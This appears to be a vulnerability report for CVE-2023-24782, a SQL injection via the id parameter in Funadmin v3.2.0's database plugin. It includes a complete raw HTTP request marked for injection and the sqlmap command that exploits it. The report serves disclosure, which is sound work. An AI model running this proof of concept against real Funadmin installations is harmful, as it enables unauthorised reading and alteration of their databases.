Headline
CVE-2023-24782: Database management plug-in database.php edit-sql registration vulnerability · Issue #3 · funadmin/funadmin
Funadmin v3.2.0 was discovered to contain a SQL injection vulnerability via the id parameter at /databases/database/edit.
Vulnerability Product:funadmin
Vulnerability version:.3.2.0
Vulnerability type:sql injection
Vulnerability Details:
Vulnerability occurs in plugin - database management plugin
Code Audit Process
Vulnerability occurs in
app\databases\controller\Database.php#edit method
Get the id directly and splice it into the sql statement
Vulnerability recurrence
Conditions: background administrator rights
sqlmap poc save as txt
`POST /databases/database/edit?id=fun_addon* HTTP/1.1
Host: 192.168.3.129:8092
Content-Length: 187
Accept: application/json, text/javascript, /; q=0.01
X-Requested-With: XMLHttpRequest
X-CSRF-TOKEN: d659d1ffb4e68ff1910c1c7c75a43539
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.3.129:8092
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: Hm_lvt_ce074243117e698438c49cd037b593eb=1673498041; ci_session=ca40t5m9pvlvp7gftr11qng0g0lofceq; PHPSESSID=591a908579ac738f0fc0f53d05c6aa51; think_lang=zh-cn; Hm_lvt_8dcaf664827c0e8ae52287ebb2411aed=1674888420; Hm_lpvt_8dcaf664827c0e8ae52287ebb2411aed=1674888420;
Connection: close
TABLE_NAME=fun_addon&ENGINE=InnoDB&TABLE_COMMENT=%E5%85%AC%E7%94%A8_%E6%8F%92%E4%BB%B6%E8%A1%A81&TABLE_ROWS=7&TABLE_COLLATION=utf8mb4_unicode_ci&token=d659d1ffb4e68ff1910c1c7c75a43539`
python sqlmap.py -r poc.txt
Related news
Funadmin v3.2.0 was discovered to contain a SQL injection vulnerability via the id parameter at /databases/database/edit.